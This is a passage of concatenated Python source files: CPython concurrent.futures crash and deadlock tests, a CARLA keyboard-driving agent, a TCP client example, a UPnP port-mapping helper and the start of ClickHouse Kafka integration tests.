p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
    def test_resources_gced_in_workers(self):
        # Ensure that the arguments for a job are correctly gc-ed after the job
# is finished
obj = EventfulGCObj(self.ctx)
future = self.executor.submit(id, obj)
future.result()
self.assertTrue(obj.event.wait(timeout=1))
create_executor_tests(ProcessPoolExecutorTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
def hide_process_stderr():
import io
sys.stderr = io.StringIO()
def _crash(delay=None):
"""Induces a segfault."""
if delay:
time.sleep(delay)
import faulthandler
faulthandler.disable()
faulthandler._sigsegv()
def _exit():
"""Induces a sys exit with exitcode 1."""
sys.exit(1)
def _raise_error(Err):
"""Function that raises an Exception in process."""
hide_process_stderr()
raise Err()
def _return_instance(cls):
"""Function that returns a instance of cls."""
hide_process_stderr()
return cls()
class CrashAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
_crash()
class CrashAtUnpickle(object):
"""Bad object that triggers a segfault at unpickling time."""
def __reduce__(self):
return _crash, ()
class ExitAtPickle(object):
"""Bad object that triggers a process exit at pickling time."""
def __reduce__(self):
_exit()
class ExitAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __reduce__(self):
return _exit, ()
class ErrorAtPickle(object):
"""Bad object that triggers an error at pickling time."""
def __reduce__(self):
from pickle import PicklingError
raise PicklingError("Error in pickle")
class ErrorAtUnpickle(object):
"""Bad object that triggers an error at unpickling time."""
def __reduce__(self):
from pickle import UnpicklingError
return _raise_error, (UnpicklingError, )
class ExecutorDeadlockTest:
TIMEOUT = 15
@classmethod
def _sleep_id(cls, x, delay):
time.sleep(delay)
return x
def _fail_on_deadlock(self, executor):
# If we did not recover before TIMEOUT seconds, consider that the
# executor is in a deadlock state and forcefully clean all its
        # components.
import faulthandler
from tempfile import TemporaryFile
with TemporaryFile(mode="w+") as f:
faulthandler.dump_traceback(file=f)
f.seek(0)
tb = f.read()
for p in executor._processes.values():
p.terminate()
        # It should be safe to call executor.shutdown() here as all possible
# deadlocks should have been broken.
executor.shutdown(wait=True)
print(f"\nTraceback:\n {tb}", file=sys.__stderr__)
self.fail(f"Executor deadlock:\n\n{tb}")
def test_crash(self):
# extensive testing for deadlock caused by crashes in a pool.
self.executor.shutdown(wait=True)
crash_cases = [
# Check problem occurring while pickling a task in
# the task_handler thread
(id, (ErrorAtPickle(),), PicklingError, "error at task pickle"),
# Check problem occurring while unpickling a task on workers
(id, (ExitAtUnpickle(),), BrokenProcessPool,
"exit at task unpickle"),
(id, (ErrorAtUnpickle(),), BrokenProcessPool,
"error at task unpickle"),
(id, (CrashAtUnpickle(),), BrokenProcessPool,
"crash at task unpickle"),
# Check problem occurring during func execution on workers
(_crash, (), BrokenProcessPool,
"crash during func execution on worker"),
(_exit, (), SystemExit,
"exit during func execution on worker"),
(_raise_error, (RuntimeError, ), RuntimeError,
"error during func execution on worker"),
# Check problem occurring while pickling a task result
# on workers
(_return_instance, (CrashAtPickle,), BrokenProcessPool,
"crash during result pickle on worker"),
(_return_instance, (ExitAtPickle,), SystemExit,
"exit during result pickle on worker"),
(_return_instance, (ErrorAtPickle,), PicklingError,
"error during result pickle on worker"),
# Check problem occurring while unpickling a task in
# the result_handler thread
(_return_instance, (ErrorAtUnpickle,), BrokenProcessPool,
"error during result unpickle in result_handler"),
(_return_instance, (ExitAtUnpickle,), BrokenProcessPool,
"exit during result unpickle in result_handler")
]
for func, args, error, name in crash_cases:
with self.subTest(name):
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
executor = self.executor_type(
max_workers=2, mp_context=get_context(self.ctx))
res = executor.submit(func, *args)
with self.assertRaises(error):
try:
res.result(timeout=self.TIMEOUT)
except futures.TimeoutError:
# If we did not recover before TIMEOUT seconds,
# consider that the executor is in a deadlock state
self._fail_on_deadlock(executor)
executor.shutdown(wait=True)
def test_shutdown_deadlock(self):
# Test that calling shutdown on the pool does not cause a deadlock
# if a worker fails after the shutdown call.
self.executor.shutdown(wait=True)
with self.executor_type(max_workers=2,
mp_context=get_context(self.ctx)) as executor:
self.executor = executor  # Allow cleanup in _fail_on_deadlock
f = executor.submit(_crash, delay=.1)
executor.shutdown(wait=True)
with self.assertRaises(BrokenProcessPool):
f.result()
create_executor_tests(ExecutorDeadlockTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class FutureTests(BaseTestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_done_callback_raises_already_succeeded(self):
with test.support.captured_stderr() as stderr:
def raising_fn(callback_future):
raise Exception('doh!')
f = Future()
# Set the result first to simulate a future that runs instantly,
# effectively allowing the callback to be run immediately.
f.set_result(5)
f.add_done_callback(raising_fn)
self.assertIn('exception calling callback for', stderr.getvalue())
self.assertIn('doh!', stderr.getvalue())
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
t.join()
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
t.join()
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
t.join()
def test_multiple_set_result(self):
f = create_future(state=PENDING)
f.set_result(1)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished returned int>'
):
f.set_result(2)
self.assertTrue(f.done())
self.assertEqual(f.result(), 1)
def test_multiple_set_exception(self):
f = create_future(state=PENDING)
e = ValueError()
f.set_exception(e)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished raised ValueError>'
):
f.set_exception(Exception())
self.assertEqual(f.exception(), e)
@test.support.reap_threads
def test_main():
try:
test.support.run_unittest(__name__)
finally:
test.support.reap_children()
if __name__ == "__main__":
test_main()
|
HumanAgent.py
|
import cv2
import numpy as np
import time
from threading import Thread
try:
import pygame
from pygame.locals import K_BACKSPACE
from pygame.locals import K_COMMA
from pygame.locals import K_DOWN
from pygame.locals import K_ESCAPE
from pygame.locals import K_F1
from pygame.locals import K_LEFT
from pygame.locals import K_PERIOD
from pygame.locals import K_RIGHT
from pygame.locals import K_SLASH
from pygame.locals import K_SPACE
from pygame.locals import K_TAB
from pygame.locals import K_UP
from pygame.locals import K_a
from pygame.locals import K_c
from pygame.locals import K_d
from pygame.locals import K_h
from pygame.locals import K_m
from pygame.locals import K_p
from pygame.locals import K_q
from pygame.locals import K_r
from pygame.locals import K_s
from pygame.locals import K_w
from pygame.locals import K_MINUS
from pygame.locals import K_EQUALS
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
import carla
from srunner.challenge.autoagents.autonomous_agent import AutonomousAgent, Track
class HumanInterface():
"""
Class to control a vehicle manually for debugging purposes
"""
def __init__(self, parent):
self.quit = False
self._parent = parent
self.WIDTH = 800
self.HEIGHT = 600
self.THROTTLE_DELTA = 0.05
self.STEERING_DELTA = 0.01
pygame.init()
pygame.font.init()
self._clock = pygame.time.Clock()
self._display = pygame.display.set_mode((self.WIDTH, self.HEIGHT), pygame.HWSURFACE | pygame.DOUBLEBUF)
pygame.display.set_caption("Human Agent")
def run(self):
while not self._parent.agent_engaged and not self.quit:
time.sleep(0.5)
controller = KeyboardControl()
while not self.quit:
self._clock.tick_busy_loop(20)
controller.parse_events(self._parent.current_control, self._clock)
# Process events
pygame.event.pump()
# process sensor data
# parent <=> agent
input_data = self._parent.sensor_interface.get_data()
image_center = input_data['Center'][1][:,:,-2::-1]
image_left = input_data['Left'][1][:,:,-2::-1]
image_right = input_data['Right'][1][:,:,-2::-1]
image_rear = input_data['Rear'][1][:,:,-2::-1]
top_row = np.hstack((image_left, image_center, image_right))
bottom_row = np.hstack((0*image_rear, image_rear, 0*image_rear))
comp_image = np.vstack((top_row, bottom_row))
# resize image
image_rescaled = cv2.resize(comp_image, dsize=(self.WIDTH, self.HEIGHT), interpolation=cv2.INTER_CUBIC)
# display image
self._surface = pygame.surfarray.make_surface(image_rescaled.swapaxes(0, 1))
if self._surface is not None:
self._display.blit(self._surface, (0, 0))
pygame.display.flip()
pygame.quit()
class HumanAgent(AutonomousAgent):
def setup(self, path_to_conf_file):
self.track = Track.ALL_SENSORS_HDMAP_WAYPOINTS
self.agent_engaged = False
self.current_control = carla.VehicleControl()
self.current_control.steer = 0.0
self.current_control.throttle = 1.0
self.current_control.brake = 0.0
self.current_control.hand_brake = False
self._hic = HumanInterface(self)
self._thread = Thread(target=self._hic.run)
self._thread.start()
def sensors(self):
"""
Define the sensor suite required by the agent
:return: a list containing the required sensors in the following format:
[
['sensor.camera.rgb', {'x':x_rel, 'y': y_rel, 'z': z_rel,
'yaw': yaw, 'pitch': pitch, 'roll': roll,
'width': width, 'height': height, 'fov': fov}, 'Sensor01'],
['sensor.camera.rgb', {'x':x_rel, 'y': y_rel, 'z': z_rel,
'yaw': yaw, 'pitch': pitch, 'roll': roll,
'width': width, 'height': height, 'fov': fov}, 'Sensor02'],
['sensor.lidar.ray_cast', {'x':x_rel, 'y': y_rel, 'z': z_rel,
'yaw': yaw, 'pitch': pitch, 'roll': roll}, 'Sensor03']
]
"""
sensors = [{'type': 'sensor.camera.rgb', 'x':0.7, 'y':0.0, 'z':1.60, 'roll':0.0, 'pitch':0.0, 'yaw':0.0,
'width':300, 'height':200, 'fov':100, 'id': 'Center'},
{'type': 'sensor.camera.rgb', 'x':0.7, 'y':-0.4, 'z': 1.60, 'roll': 0.0, 'pitch': 0.0,
'yaw': -45.0, 'width': 300, 'height': 200, 'fov': 100, 'id': 'Left'},
{'type': 'sensor.camera.rgb', 'x': 0.7, 'y':0.4, 'z':1.60, 'roll':0.0, 'pitch':0.0, 'yaw':45.0,
'width':300, 'height':200, 'fov': 100, 'id': 'Right'},
{'type': 'sensor.camera.rgb', 'x': -1.8, 'y': 0, 'z': 1.60, 'roll': 0.0, 'pitch': 0.0,
'yaw': 180.0, 'width': 300, 'height': 200, 'fov': 130, 'id': 'Rear'},
{'type': 'sensor.other.gnss', 'x': 0.7, 'y': -0.4, 'z': 1.60, 'id': 'GPS'}
]
return sensors
def run_step(self, input_data, timestamp):
self.agent_engaged = True
time.sleep(0.1)
return self.current_control
def destroy(self):
self._hic.quit = True
self._thread.join()
class KeyboardControl(object):
def __init__(self):
self._control = carla.VehicleControl()
self._steer_cache = 0.0
def parse_events(self, control, clock):
for event in pygame.event.get():
if event.type == pygame.QUIT:
return True
self._parse_vehicle_keys(pygame.key.get_pressed(), clock.get_time())
control.steer = self._control.steer
control.throttle = self._control.throttle
control.brake = self._control.brake
control.hand_brake = self._control.hand_brake
def _parse_vehicle_keys(self, keys, milliseconds):
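# Key bindings: W/Up applies throttle (0.6), S/Down applies full brake,
# A/Left and D/Right steer via an accumulated cache clamped to [-0.95, 0.95],
# and Space engages the hand brake.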
self._control.throttle = 0.6 if keys[K_UP] or keys[K_w] else 0.0
steer_increment = 15.0 * 5e-4 * milliseconds
if keys[K_LEFT] or keys[K_a]:
self._steer_cache -= steer_increment
elif keys[K_RIGHT] or keys[K_d]:
self._steer_cache += steer_increment
else:
self._steer_cache = 0.0
self._steer_cache = min(0.95, max(-0.95, self._steer_cache))
self._control.steer = round(self._steer_cache, 1)
self._control.brake = 1.0 if keys[K_DOWN] or keys[K_s] else 0.0
self._control.hand_brake = keys[K_SPACE]
|
example_client.py
|
# File: example_client.py
# Aim: Define example of client connection
import socket
import threading
from . import CONFIG, tools
CONFIG.logger.debug('Define components in TCP package')
class ExampleClient(object):
def __init__(self, IP, port):
# Initialize and setup client
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# Connect to IP:port
client.connect((IP, port))
name = client.getsockname()
# Report and set attributes
CONFIG.logger.info(
f'Client {name} is connected to server at {IP}:{port}')
self.client = client
self.name = name
def listen(self):
# Listen to the server
CONFIG.logger.info(f'Client {self.name} starts listening')
while True:
# Wait until new message is received
income = self.client.recv(tools.buffer_size)
CONFIG.logger.info(f'Received {income} from server')
def start(self):
# Start client connection to server
thread = threading.Thread(
target=self.listen, name='TCP connection client')
thread.daemon = True
thread.start()
CONFIG.logger.info(f'Client starts listening')
# Say hello to server
self.send(f'Hello from client {self.name}')
def send(self, message):
# Send [message] to server
message = tools.encode(message)
self.client.sendall(message)
CONFIG.logger.debug(f'Sent {message} to server')
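# Example usage (a sketch; the host and port below are illustrative
# assumptions, not values defined by this module):
#
#     client = ExampleClient('127.0.0.1', 8619)
#     client.start()        # start listening in a daemon thread and greet the server
#     client.send('ping')   # later messages are encoded by tools.encode and sent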
|
upnp.py
|
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "maize", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run maize, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join(5)
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
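# Example usage (a sketch; the port number is illustrative):
#
#     upnp = UPnP()       # starts the worker thread and discovers the gateway
#     upnp.remap(8444)    # queue a request to open TCP port 8444
#     ...
#     upnp.release(8444)  # queue a request to close the mapping
#     upnp.shutdown()     # stop the worker thread (also called from __del__)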
|
test.py
|
import json
import os.path as p
import random
import socket
import threading
import time
import logging
import io
import string
import avro.schema
import avro.io
import avro.datafile
from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
from confluent_kafka import admin
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.protocol.admin import DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
from kafka.admin import NewTopic
# protoc --version
# libprotoc 3.0.0
# # to create kafka_pb2.py
# protoc --python_out=. kafka.proto
from . import kafka_pb2
from . import social_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml'],
with_kafka=True,
with_zookeeper=True, # For Replicated Table
macros={"kafka_broker":"kafka1",
"kafka_topic_old":"old",
"kafka_group_name_old":"old",
"kafka_topic_new":"new",
"kafka_group_name_new":"new",
"kafka_client_id":"instance",
"kafka_format_json_each_row":"JSONEachRow"},
clickhouse_path_dir='clickhouse_path')
def get_kafka_producer(port, serializer, retries):
errors = []
for _ in range(retries):
try:
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(port), value_serializer=serializer)
logging.debug("Kafka Connection establised: localhost:{}".format(port))
return producer
except Exception as e:
errors += [str(e)]
time.sleep(1)
raise Exception("Connection not establised, {}".format(errors))
def producer_serializer(x):
return x.encode() if isinstance(x, str) else x
def kafka_produce(kafka_cluster, topic, messages, timestamp=None, retries=15):
logging.debug("kafka_produce server:{}:{} topic:{}".format("localhost", kafka_cluster.kafka_port, topic))
producer = get_kafka_producer(kafka_cluster.kafka_port, producer_serializer, retries)
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
## just to ensure the python client / producer is working properly
def kafka_producer_send_heartbeat_msg(kafka_cluster, max_retries=50):
kafka_produce(kafka_cluster, 'test_heartbeat_topic', ['test'], retries=max_retries)
def kafka_consume(kafka_cluster, topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), auto_offset_reset="earliest")
consumer.subscribe(topics=(topic,))
for toppar, messages in list(consumer.poll(5000).items()):
if toppar.topic == topic:
for message in messages:
yield message.value.decode()
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(kafka_cluster, topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, topic, start_index, num_messages):
data = ''
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
producer.send(topic=topic, value=serialized_msg)
producer.flush()
logging.debug("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(kafka_cluster, topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = social_pb2.User()
msg.username='John Doe {}'.format(i)
msg.timestamp=1000000+i
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_message(value):
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
bytes_writer = io.BytesIO()
# writer = avro.io.DatumWriter(schema)
# encoder = avro.io.BinaryEncoder(bytes_writer)
# writer.write(value, encoder)
# DataFileWriter seems to be mandatory to get the schema encoded
writer = avro.datafile.DataFileWriter(bytes_writer, avro.io.DatumWriter(), schema)
if isinstance(value, list):
for v in value:
writer.append(v)
else:
writer.append(value)
writer.flush()
raw_bytes = bytes_writer.getvalue()
writer.close()
bytes_writer.close()
return raw_bytes
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> str
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
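# Example (sketch): both Avro helpers return raw bytes, which pass through
# producer_serializer unchanged and can therefore be fed to kafka_produce
# directly from a test that receives the kafka_cluster fixture, e.g.
#     kafka_produce(kafka_cluster, 'avro_topic',
#                   [avro_message({'id': 0, 'blockNo': 0, 'val1': 'AM',
#                                  'val2': 0.5, 'val3': 1})])
# (the topic name here is illustrative)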
# Tests
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Insert couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'new')
assert members[0]['client_id'] == 'instance test 1234'
def test_kafka_json_as_string(kafka_cluster):
kafka_produce(kafka_cluster, 'kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
# 'tombstone' record (null value) = marker of deleted record
